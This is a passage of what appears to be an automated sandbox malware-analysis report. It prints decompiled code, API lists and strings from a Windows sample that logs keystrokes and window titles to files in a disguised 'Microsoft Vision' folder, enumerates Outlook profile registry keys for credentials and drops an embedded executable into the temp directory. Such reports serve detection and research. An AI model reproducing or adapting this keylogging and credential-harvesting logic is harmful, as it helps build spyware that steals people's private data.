                                      											if( *_t96 != _t198) {
                                      												_t213 = _t212 - 0x10;
                                      												__eflags = _t96 + 0xa18;
                                      												E00401301(_t213, _t96 + 0xa18, _t96 + 0xa18);
                                      												_t208 = _t213 - 0x10;
                                      												E004033F3(_t208,  &_v636);
                                      												 *((intOrPtr*)(_t208 + 4)) = _v636;
                                      												 *((short*)(_t208 + 8)) = _v632;
                                      												E004033F3(_t208 + 0xc,  &_v628);
                                      												_t152 = E004044F4( &_v612, __eflags);
                                      												_t189 =  *0x4166ac; // 0x416d98
                                      												_t36 = _t189 + 0xa50; // 0x18fcf8
                                      												E00404A3D( *_t36, _t152);
                                      												E004044CA( &_v648);
                                      												_t96 =  *0x4166ac; // 0x416d98
                                      											}
                                      											__eflags =  *((intOrPtr*)(_t96 + 0xa14)) - _t198;
                                      											if( *((intOrPtr*)(_t96 + 0xa14)) != _t198) {
                                      												_t100 = lstrlenW(_t96 + 0x210);
                                      												__eflags = _t100;
                                      												_t101 =  *0x4166ac; // 0x416d98
                                      												if(_t100 == 0) {
                                      													L17:
                                      													_t102 = _t101 + 0x210;
                                      													__eflags = _t102;
                                      													lstrcpyW(_t102, _v632);
                                      													_t104 =  *0x4166ac; // 0x416d98
                                      													 *(_t104 + 0xa10) = _t198;
                                      												} else {
                                      													_t142 = E0040300E( &_v648, E004033AB( &_v636, _t101 + 0x210));
                                      													E004058FB(_v644);
                                      													_t101 =  *0x4166ac; // 0x416d98
                                      													_v644 = _t198;
                                      													__eflags = _t142;
                                      													if(_t142 == 0) {
                                      														goto L17;
                                      													} else {
                                      														 *((intOrPtr*)(_t101 + 0xa10)) = 1;
                                      													}
                                      												}
                                      												_t46 = _t104 + 0xc; // 0x2680000
                                      												_t105 = CreateFileW( *_t46, 4, 1, _t198, 4, 0x80, _t198);
                                      												_t178 =  *0x4166ac; // 0x416d98
                                      												 *(_t178 + 4) = _t105;
                                      												__eflags =  *((intOrPtr*)(_t178 + 0xa10)) - _t198;
                                      												if(__eflags == 0) {
                                      													_t49 = _t178 + 8; // 0x416da0
                                      													_t204 = L"\r\n";
                                      													_t116 = lstrlenW(_t204);
                                      													_t117 =  *0x4166ac; // 0x416d98
                                      													_t50 = _t117 + 4; // 0x268
                                      													WriteFile( *_t50, _t204, _t116, _t49, _t198);
                                      													_t119 =  *0x4166ac; // 0x416d98
                                      													_t121 = lstrlenW(_t204);
                                      													_t122 =  *0x4166ac; // 0x416d98
                                      													_t51 = _t122 + 4; // 0x268
                                      													WriteFile( *_t51, _t204, _t121, _t119 + 8, _t198);
                                      													_t124 =  *0x4166ac; // 0x416d98
                                      													_t126 = E00403027( &_v632);
                                      													_t128 =  *0x4166ac; // 0x416d98
                                      													_t54 = _t128 + 4; // 0x268
                                      													WriteFile( *_t54, _v632, _t126 + _t126, _t124 + 8, _t198);
                                      													_t130 =  *0x4166ac; // 0x416d98
                                      													_t206 = L"\r\n";
                                      													_t132 = lstrlenW(_t206);
                                      													_t133 =  *0x4166ac; // 0x416d98
                                      													_t55 = _t133 + 4; // 0x268
                                      													WriteFile( *_t55, _t206, _t132, _t130 + 8, _t198);
                                      													_t135 =  *0x4166ac; // 0x416d98
                                      													_t136 = _t135 + 8;
                                      													__eflags = _t136;
                                      													_t137 = lstrlenW(_t206);
                                      													_t138 =  *0x4166ac; // 0x416d98
                                      													_t56 = _t138 + 4; // 0x268
                                      													WriteFile( *_t56, _t206, _t137, _t136, _t198);
                                      													_t178 =  *0x4166ac; // 0x416d98
                                      												}
                                      												_t58 = _t178 + 8; // 0x416da0
                                      												_t109 = lstrlenW(E00407EC8( *((intOrPtr*)(_v616 + 0x16)), __eflags)) + _t108;
                                      												__eflags = _t109;
                                      												_t110 = E00407EC8( *((intOrPtr*)(_v616 + 0x16)), _t109);
                                      												_t111 =  *0x4166ac; // 0x416d98
                                      												_t61 = _t111 + 4; // 0x268
                                      												WriteFile( *_t61, _t110, _t109, _t58, _t198);
                                      												_t113 =  *0x4166ac; // 0x416d98
                                      												_t62 = _t113 + 4; // 0x268
                                      												CloseHandle( *_t62);
                                      											}
                                      											E004058FB(_v620);
                                      											_v620 = _t198;
                                      											E004058FB(_v632);
                                      											_t201 = _v644;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							_t198 = DefWindowProcA(_a4, _a8, _a12, _a16);
                                      						}
                                      					}
                                      				}
                                      				E004058FB(_t201);
                                      				return _t198;
                                      			}



































































                                      0x00407b3d
                                      0x00407b4a
                                      0x00407b4e
                                      0x00407b56
                                      0x00407b59
                                      0x00407b5b
                                      0x00407b5f
                                      0x00407b62
                                      0x00407e8b
                                      0x00407e8e
                                      0x00407e96
                                      0x00407e99
                                      0x00407ea3
                                      0x00407eab
                                      0x00407eb0
                                      0x00407b68
                                      0x00407b68
                                      0x00407b6b
                                      0x00407e81
                                      0x00407b71
                                      0x00407b76
                                      0x00407b93
                                      0x00407ba1
                                      0x00407ba7
                                      0x00407baa
                                      0x00407bb9
                                      0x00407bbb
                                      0x00407bbf
                                      0x00407bc1
                                      0x00407bc9
                                      0x00407bd7
                                      0x00407bdd
                                      0x00407be1
                                      0x00407be7
                                      0x00407bee
                                      0x00407c05
                                      0x00407c0b
                                      0x00407c0d
                                      0x00407c3b
                                      0x00407c0f
                                      0x00407c22
                                      0x00407c2b
                                      0x00407c2b
                                      0x00407c47
                                      0x00407c55
                                      0x00407c5a
                                      0x00407c67
                                      0x00407c6c
                                      0x00407c71
                                      0x00407c73
                                      0x00407c75
                                      0x00407c78
                                      0x00407c80
                                      0x00407c8c
                                      0x00407c91
                                      0x00407c9d
                                      0x00407ca5
                                      0x00407cae
                                      0x00407cb7
                                      0x00407cbc
                                      0x00407cc3
                                      0x00407cc9
                                      0x00407cd2
                                      0x00407cd7
                                      0x00407cd7
                                      0x00407cdc
                                      0x00407ce2
                                      0x00407cee
                                      0x00407cf7
                                      0x00407cf9
                                      0x00407cfe
                                      0x00407d39
                                      0x00407d3d
                                      0x00407d3d
                                      0x00407d43
                                      0x00407d49
                                      0x00407d4e
                                      0x00407d00
                                      0x00407d14
                                      0x00407d1f
                                      0x00407d24
                                      0x00407d29
                                      0x00407d2d
                                      0x00407d2f
                                      0x00000000
                                      0x00407d31
                                      0x00407d31
                                      0x00407d31
                                      0x00407d2f
                                      0x00407d60
                                      0x00407d63
                                      0x00407d69
                                      0x00407d75
                                      0x00407d78
                                      0x00407d7e
                                      0x00407d85
                                      0x00407d88
                                      0x00407d8f
                                      0x00407d96
                                      0x00407d9c
                                      0x00407d9f
                                      0x00407da1
                                      0x00407dac
                                      0x00407db3
                                      0x00407db9
                                      0x00407dbc
                                      0x00407dbe
                                      0x00407dd0
                                      0x00407dd8
                                      0x00407dde
                                      0x00407de1
                                      0x00407de3
                                      0x00407de8
                                      0x00407df3
                                      0x00407dfa
                                      0x00407e00
                                      0x00407e03
                                      0x00407e05
                                      0x00407e0b
                                      0x00407e0b
                                      0x00407e10
                                      0x00407e17
                                      0x00407e1d
                                      0x00407e20
                                      0x00407e22
                                      0x00407e22
                                      0x00407e2c
                                      0x00407e43
                                      0x00407e43
                                      0x00407e46
                                      0x00407e4c
                                      0x00407e51
                                      0x00407e54
                                      0x00407e56
                                      0x00407e5b
                                      0x00407e5e
                                      0x00407e5e
                                      0x00407e68
                                      0x00407e71
                                      0x00407e75
                                      0x00407e7a
                                      0x00407e7a
                                      0x00407bee
                                      0x00407be1
                                      0x00407bc1
                                      0x00407b78
                                      0x00407b8a
                                      0x00407b8a
                                      0x00407b76
                                      0x00407b6b
                                      0x00407eb8
                                      0x00407ec5

                                      APIs
                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00407B84
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00407BA1
                                      • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 00407BD7
                                      • GetForegroundWindow.USER32 ref: 00407BF4
                                      • GetWindowTextW.USER32 ref: 00407C05
                                      • lstrlenW.KERNEL32(00416B88,00416D88,?,Unknow), ref: 00407CEE
                                      • PostQuitMessage.USER32 ref: 00407E81
                                      • RegisterRawInputDevices.USER32 ref: 00407EB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                      • String ID: Unknow
                                      • API String ID: 3853268301-1240069140
                                      • Opcode ID: 878580e6619826a15b31a56a49ed1ffb6a430dfa9939ff47c25cfcecec706822
                                      • Instruction ID: ed6d52860f336a14c355bf99705e32785600692f8a2995653f26284368457ea2
                                      • Opcode Fuzzy Hash: 878580e6619826a15b31a56a49ed1ffb6a430dfa9939ff47c25cfcecec706822
                                      • Instruction Fuzzy Hash: FDA17C71504200AFCB00EF65DC85DAB7BA8FF88305F04857AF949E72A1CB75E915CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E004080AA(void* __eflags, void* _a4) {
                                      				short _v544;
                                      				char _v696;
                                      				short _v704;
                                      				intOrPtr _v720;
                                      				struct _WNDCLASSW _v760;
                                      				void* _v784;
                                      				struct tagMSG _v788;
                                      				struct _SYSTEMTIME _v804;
                                      				void* _v808;
                                      				struct HINSTANCE__* _v812;
                                      				long _v820;
                                      				intOrPtr _t54;
                                      				intOrPtr _t57;
                                      				intOrPtr _t60;
                                      				intOrPtr _t62;
                                      				intOrPtr _t65;
                                      				intOrPtr _t68;
                                      				intOrPtr _t73;
                                      				struct HWND__* _t77;
                                      				int _t81;
                                      				intOrPtr _t102;
                                      				void* _t103;
                                      				intOrPtr _t107;
                                      				void* _t115;
                                      				void* _t121;
                                      				struct HINSTANCE__* _t122;
                                      				struct HWND__* _t123;
                                      				intOrPtr _t125;
                                      				signed int _t126;
                                      				signed int _t132;
                                      				intOrPtr _t135;
                                      				intOrPtr _t138;
                                      				void* _t146;
                                      				void* _t147;
                                      				long _t151;
                                      				void* _t156;
                                      				void* _t157;
                                      				signed int _t159;
                                      				signed int _t160;
                                      				void* _t162;
                                      				signed int _t163;
                                      				void* _t168;
                                      
                                      				_t122 = GetModuleHandleA(0);
                                      				_v804.wSecond = _t122;
                                      				_v788.hwnd = _v788.hwnd & 0;
                                      				_t126 = 0xa;
                                      				memset( &(_v760.hIcon), 0, _t126 << 2);
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_t54 =  *0x4166ac; // 0x416d98
                                      				_t151 = 0;
                                      				E00401052(_t54 + 0x210, 0, 0x800);
                                      				_t57 =  *0x4166ac; // 0x416d98
                                      				E00401052(_t57 + 0x10, 0, 0x208);
                                      				_t60 =  *0x4166ac; // 0x416d98
                                      				_t168 = (_t163 & 0xfffffff8) - 0x314 + 0x24;
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t60 + 0x10, _t147, _t157, _t121);
                                      				_t62 =  *0x4166ac; // 0x416d98
                                      				lstrcatW(_t62 + 0x10, L"\\Microsoft Vision\\");
                                      				_t65 =  *0x4166ac; // 0x416d98
                                      				CreateDirectoryW(_t65 + 0x10, 0);
                                      				_t68 =  *0x4166ac; // 0x416d98
                                      				_t171 =  *((intOrPtr*)(_t68 + 0xa14));
                                      				if( *((intOrPtr*)(_t68 + 0xa14)) != 0) {
                                      					E00401052( &_v544, 0, 0x208);
                                      					_t107 =  *0x4166ac; // 0x416d98
                                      					_t168 = _t168 + 0xc;
                                      					lstrcpyW( &_v544, _t107 + 0x10);
                                      					lstrcatW( &_v544, "*");
                                      					E004033AB(_t168,  &_v544);
                                      					_t115 = E0040DA4F( &(_v760.lpszClassName), _t171, 0);
                                      					_t125 =  *0x4166ac; // 0x416d98
                                      					_t156 = _t115;
                                      					_t13 = _t125 + 0xa18; // 0x4177b0
                                      					E00401815(_t13, _t171);
                                      					_t162 = 0;
                                      					if( *((intOrPtr*)(_t156 + 8)) > 0) {
                                      						do {
                                      							_t168 = _t168 - 0x18;
                                      							E00401862(_t156, _t168, _t162);
                                      							_t15 = _t125 + 0xa18; // 0x4177b0
                                      							E00401716(_t15);
                                      							_t162 = _t162 + 1;
                                      						} while (_t162 <  *((intOrPtr*)(_t156 + 8)));
                                      					}
                                      					_t143 = _v720;
                                      					if(_v720 != 0) {
                                      						E00401A75(_t143, _t143);
                                      					}
                                      					_t122 = _v812;
                                      					_t151 = 0;
                                      				}
                                      				_t146 = 4;
                                      				_t159 = E0040326D( &_v812, _t146, 0);
                                      				E004030FB(E00403230( &_v808, _t146, 0, L"ExplorerIdentifier"), 0, _t159);
                                      				E004058FB(_v820);
                                      				_t73 =  *0x4166ac; // 0x416d98
                                      				_v820 = _t151;
                                      				if( *((intOrPtr*)(_t73 + 0xa14)) != _t151) {
                                      					GetLocalTime( &_v804);
                                      					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
                                      					_t135 =  *0x4166ac; // 0x416d98
                                      					_t168 = _t168 + 0x20;
                                      					_t33 = _t135 + 0x10; // 0x416da8
                                      					E00403230(E00403230(_t135 + 0xc, _t146, _t135 + 0xc, _t33), _t146, _t135 + 0xc,  &_v696);
                                      					_t102 =  *0x4166ac; // 0x416d98
                                      					_t34 = _t102 + 0xc; // 0x2680000
                                      					_t103 = CreateFileW( *_t34, 0x10000000, 1, _t151, 2, 0x80, _t151);
                                      					_t138 =  *0x4166ac; // 0x416d98
                                      					 *(_t138 + 4) = _t103;
                                      					CloseHandle(_t103);
                                      				}
                                      				_v760.lpszClassName = _v808;
                                      				_v760.lpfnWndProc = E00407B2E;
                                      				_v760.hInstance = _t122;
                                      				RegisterClassW( &_v760);
                                      				_t77 = CreateWindowExW(_t151, _v760.lpszClassName, _t151, _t151, _t151, _t151, _t151, _t151, 0xfffffffd, _t151, _t122, _a4);
                                      				_t132 = 7;
                                      				_t123 = _t77;
                                      				memset( &_v788, 0, _t132 << 2);
                                      				_t81 = GetMessageA( &_v788, _t123, 0, 0);
                                      				if(_t81 == 0) {
                                      					L12:
                                      					_t160 = _v788.wParam;
                                      				} else {
                                      					_t160 = _t159 | 0xffffffff;
                                      					while(_t81 != _t160) {
                                      						TranslateMessage( &_v788);
                                      						DispatchMessageA( &_v788);
                                      						_t81 = GetMessageA( &_v788, _t123, 0, 0);
                                      						if(_t81 != 0) {
                                      							continue;
                                      						} else {
                                      							goto L12;
                                      						}
                                      						goto L13;
                                      					}
                                      				}
                                      				L13:
                                      				E004058FB(_v808);
                                      				return _t160;
                                      			}













































                                      0x004080c1
                                      0x004080c9
                                      0x004080cd
                                      0x004080d3
                                      0x004080d4
                                      0x004080da
                                      0x004080e0
                                      0x004080e1
                                      0x004080e2
                                      0x004080e3
                                      0x004080e8
                                      0x004080f1
                                      0x004080f6
                                      0x00408108
                                      0x0040810d
                                      0x00408112
                                      0x0040811e
                                      0x00408124
                                      0x00408138
                                      0x0040813a
                                      0x00408144
                                      0x0040814a
                                      0x0040814f
                                      0x00408155
                                      0x00408169
                                      0x0040816e
                                      0x00408173
                                      0x00408182
                                      0x00408195
                                      0x004081a2
                                      0x004081ab
                                      0x004081b0
                                      0x004081b6
                                      0x004081b9
                                      0x004081bf
                                      0x004081c4
                                      0x004081c9
                                      0x004081cb
                                      0x004081cb
                                      0x004081d4
                                      0x004081d9
                                      0x004081df
                                      0x004081e4
                                      0x004081e5
                                      0x004081cb
                                      0x004081ea
                                      0x004081f0
                                      0x004081f3
                                      0x004081f3
                                      0x004081f8
                                      0x004081fc
                                      0x004081fc
                                      0x00408200
                                      0x00408213
                                      0x0040821d
                                      0x00408226
                                      0x0040822b
                                      0x00408230
                                      0x0040823a
                                      0x00408245
                                      0x0040827c
                                      0x00408282
                                      0x0040828f
                                      0x00408293
                                      0x004082a1
                                      0x004082a6
                                      0x004082bb
                                      0x004082be
                                      0x004082c4
                                      0x004082cb
                                      0x004082ce
                                      0x004082ce
                                      0x004082d8
                                      0x004082e1
                                      0x004082e9
                                      0x004082ed
                                      0x00408308
                                      0x00408310
                                      0x00408311
                                      0x0040831b
                                      0x00408329
                                      0x0040832d
                                      0x0040835c
                                      0x0040835c
                                      0x0040832f
                                      0x0040832f
                                      0x00408332
                                      0x0040833b
                                      0x00408346
                                      0x00408356
                                      0x0040835a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040835a
                                      0x00408332
                                      0x00408360
                                      0x00408364
                                      0x00408371

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004080BB
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,00416D88), ref: 0040811E
                                      • lstrcatW.KERNEL32 ref: 00408138
                                      • CreateDirectoryW.KERNEL32(00416D88,00000000), ref: 00408144
                                      • lstrcpyW.KERNEL32(?,00416D88), ref: 00408182
                                      • lstrcatW.KERNEL32 ref: 00408195
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 0040DA4F: FindFirstFileW.KERNEL32(?,?), ref: 0040DA7C
                                      • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00408245
                                      • wsprintfW.USER32 ref: 0040827C
                                      • CreateFileW.KERNEL32(02680000,10000000,00000001,00000000,00000002,00000080,00000000), ref: 004082BE
                                      • CloseHandle.KERNEL32(00000000), ref: 004082CE
                                      • RegisterClassW.USER32 ref: 004082ED
                                      • CreateWindowExW.USER32 ref: 00408308
                                      • GetMessageA.USER32 ref: 00408329
                                      • TranslateMessage.USER32(?), ref: 0040833B
                                      • DispatchMessageA.USER32 ref: 00408346
                                      • GetMessageA.USER32 ref: 00408356
                                      Strings
                                      • C:\Users\user\AppData\Local\Microsoft Vision\13-01-2023_19.10.28, xrefs: 00408299
                                      • ExplorerIdentifier, xrefs: 0040820A
                                      • \Microsoft Vision\, xrefs: 00408132
                                      • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00408276
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$C:\Users\user\AppData\Local\Microsoft Vision\13-01-2023_19.10.28$ExplorerIdentifier$\Microsoft Vision\
                                      • API String ID: 2678186124-2997561893
                                      • Opcode ID: 2d8d0eb04a9ae61cb7b38fce995887743f4f9dc18ce061417351f8168c574850
                                      • Instruction ID: d3391ab1d8b0e75b663357389b2e2ee8065fb15395a77d3dc1c98ebc9ef9420a
                                      • Opcode Fuzzy Hash: 2d8d0eb04a9ae61cb7b38fce995887743f4f9dc18ce061417351f8168c574850
                                      • Instruction Fuzzy Hash: 8471B072504300ABC710EB65DC49E9BB7ECEF88704F00893EF685E7291DA79D915CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00408BF6(intOrPtr __ecx, void* __edx, void* __eflags) {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				intOrPtr _v20;
                                      				short _v4116;
                                      				short _v8212;
                                      				short _v12308;
                                      				long _t68;
                                      				int _t74;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				short* _t80;
                                      
                                      				_t76 = __edx;
                                      				_t75 = __ecx;
                                      				E00401130(0x3014, __ecx);
                                      				_v20 = _t75;
                                      				_t74 = 0;
                                      				E00401052( &_v4116, 0, 0x800);
                                      				E00401052( &_v8212, 0, 0x800);
                                      				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
                                      					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                      					if(__eflags != 0) {
                                      						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                      						if(__eflags != 0) {
                                      							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
                                      							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
                                      							if(__eflags != 0) {
                                      								L15:
                                      								__eflags = 0;
                                      								return 0;
                                      							}
                                      							_push(_t80);
                                      							L8:
                                      							lstrcpyW( &_v4116, ??);
                                      							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
                                      								goto L15;
                                      							}
                                      							if(_v16 <= _t74) {
                                      								L14:
                                      								return 1;
                                      							} else {
                                      								goto L10;
                                      							}
                                      							while(1) {
                                      								L10:
                                      								_v12 = 0x800;
                                      								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
                                      									goto L15;
                                      								}
                                      								RegCloseKey(_v8);
                                      								lstrcpyW( &_v8212,  &_v4116);
                                      								lstrcatW( &_v8212, "\\");
                                      								lstrcatW( &_v8212,  &_v12308);
                                      								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
                                      								_t90 = _t68;
                                      								if(_t68 != 0) {
                                      									goto L15;
                                      								}
                                      								_push(_t75);
                                      								_t75 = _v20;
                                      								E00408DB8(_t75, _t76, _t90, _v8);
                                      								RegCloseKey(_v8);
                                      								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
                                      									goto L15;
                                      								}
                                      								_t74 = _t74 + 1;
                                      								if(_t74 < _v16) {
                                      									continue;
                                      								}
                                      								goto L14;
                                      							}
                                      							goto L15;
                                      						}
                                      						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
                                      						goto L8;
                                      					}
                                      					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                      					goto L8;
                                      				}
                                      				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                      				goto L8;
                                      			}















                                      0x00408bf6
                                      0x00408bf6
                                      0x00408bfe
                                      0x00408c0b
                                      0x00408c0f
                                      0x00408c19
                                      0x00408c2a
                                      0x00408c51
                                      0x00408c6c
                                      0x00408c6e
                                      0x00408c89
                                      0x00408c8b
                                      0x00408c9a
                                      0x00408ca7
                                      0x00408ca9
                                      0x00408db1
                                      0x00408db1
                                      0x00000000
                                      0x00408db1
                                      0x00408caf
                                      0x00408cb0
                                      0x00408cbd
                                      0x00408cdb
                                      0x00000000
                                      0x00000000
                                      0x00408ce4
                                      0x00408dac
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408cea
                                      0x00408cea
                                      0x00408cec
                                      0x00408d0e
                                      0x00000000
                                      0x00000000
                                      0x00408d17
                                      0x00408d2b
                                      0x00408d39
                                      0x00408d4d
                                      0x00408d6a
                                      0x00408d6c
                                      0x00408d6e
                                      0x00000000
                                      0x00000000
                                      0x00408d70
                                      0x00408d74
                                      0x00408d77
                                      0x00408d7f
                                      0x00408da0
                                      0x00000000
                                      0x00000000
                                      0x00408da2
                                      0x00408da6
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408da6
                                      0x00000000
                                      0x00408cea
                                      0x00408c8d
                                      0x00000000
                                      0x00408c8d
                                      0x00408c70
                                      0x00000000
                                      0x00408c70
                                      0x00408c53
                                      0x00000000

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32 ref: 00408C4D
                                      • RegOpenKeyExW.ADVAPI32 ref: 00408C6A
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00408CBD
                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408CD3
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 00408D06
                                      • RegCloseKey.ADVAPI32(?), ref: 00408D17
                                      • lstrcpyW.KERNEL32(?,?), ref: 00408D2B
                                      • lstrcatW.KERNEL32 ref: 00408D39
                                      • lstrcatW.KERNEL32 ref: 00408D4D
                                      • RegOpenKeyExW.ADVAPI32 ref: 00408D6A
                                      • RegCloseKey.ADVAPI32(?), ref: 00408D7F
                                      • RegOpenKeyExW.ADVAPI32 ref: 00408D9C
                                      Strings
                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C7D, 00408C8D
                                      • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C9A, 00408C9F, 00408CAF
                                      • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C43
                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C60, 00408C70
                                      • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00408C53
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                      • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                      • API String ID: 1891545080-2020977430
                                      • Opcode ID: 6390e3d158b97c03608cfc6f2d33eca44b2fd2720ea8140068109654491e0c6a
                                      • Instruction ID: 36bb1415bf3775e9a0181c12a18c835e4935d6713fb098edef68003d53ce56a5
                                      • Opcode Fuzzy Hash: 6390e3d158b97c03608cfc6f2d33eca44b2fd2720ea8140068109654491e0c6a
                                      • Instruction Fuzzy Hash: D6413DB190011DBEEB20DB918D45EEB7B7CEF14344F1005BABA45E2051EA789F949A74
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 81%
                                      			E004106E2(void* __eax, void* __ebx, void* __ecx, void* __esi, long _a4) {
                                      				intOrPtr* _v8;
                                      				long _v12;
                                      				struct _SHELLEXECUTEINFOA _v72;
                                      				char _v1096;
                                      				char _v2120;
                                      				char _v3144;
                                      				void* _t40;
                                      				void* _t42;
                                      				void* _t71;
                                      				void* _t77;
                                      				void* _t90;
                                      				struct HRSRC__* _t91;
                                      				void* _t94;
                                      
                                      				_t90 = __esi + 1;
                                      				_t77 = __ecx + 1;
                                      				 *((intOrPtr*)(__ebx + 0x86183c1)) =  *((intOrPtr*)(__ebx + 0x86183c1)) + _t77;
                                      				_t71 = __ebx + __eax;
                                      				_push(_t71);
                                      				_push(_t90);
                                      				_t82 =  *_a4;
                                      				_t72 = _t77 + 4;
                                      				_v8 = _t77 + 4;
                                      				E004031FD(_t72, E0040F56D( &_a4,  *_a4 + 4,  *_t82));
                                      				E004058FB(_a4);
                                      				_t91 = FindResourceW(0, 0x67, L"WM_FIND");
                                      				_t40 = LoadResource(0, _t91);
                                      				_a4 = SizeofResource(0, _t91);
                                      				_t42 = LockResource(_t40);
                                      				E00401052( &_v1096, 0, 0x400);
                                      				E00401052( &_v2120, 0, 0x400);
                                      				GetTempPathA(0x400,  &_v1096);
                                      				lstrcatA( &_v1096, "find.exe");
                                      				GetTempPathA(0x400,  &_v2120);
                                      				lstrcatA( &_v2120, "find.db");
                                      				_t94 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                      				WriteFile(_t94, _t42, _a4,  &_v12, 0);
                                      				CloseHandle(_t94);
                                      				E00401052( &_v3144, 0, 0x400);
